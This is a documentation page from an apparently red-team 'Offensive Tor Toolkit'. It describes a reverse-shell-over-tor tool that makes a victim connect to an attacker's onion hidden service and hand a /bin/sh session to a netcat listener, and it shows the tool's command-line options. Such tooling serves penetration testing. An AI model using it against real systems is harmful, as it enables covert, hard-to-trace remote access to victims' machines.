Offensive Tor Toolkit
  • Introduction
  • TL;DR
  • Toolkit Overview
    • Download
    • reverse-shell-over-tor
    • hidden-bind-shell
    • hidden-portforwarding
    • tcp2tor-proxy
  • PoC - Proof Of Concept
    • Overview
    • Gaining access with reverse-shell-over-tor
    • Multi-shell access with hidden-bind-shell
    • Pivoting with hidden-portforwarding and Chisel
    • Remote port forwarding with tcp2tor-proxy
Powered by GitBook
On this page

Was this helpful?

  1. Toolkit Overview

reverse-shell-over-tor

The victim connects to a Hidden Service hosted by the attacker.

This tool allows the victim to connect to the Hidden Service of the attacker. If the attacker starts a netcat handler, it will give him a shell session.

Some parameters need to be set:

$ ./reverse-shell-over-tor -h
Usage of reverse-shell-over-tor:

  -listener string
        Listener address. Format: <ONION_ADDR>:<PORT>
  -reverse-shell-program string
        Program to execute on reverse-shell (default "/bin/sh")
  -timeout int
        Timeout in seconds for Tor setup (default 180)
PreviousDownloadNexthidden-bind-shell

Last updated 3 years ago

Was this helpful?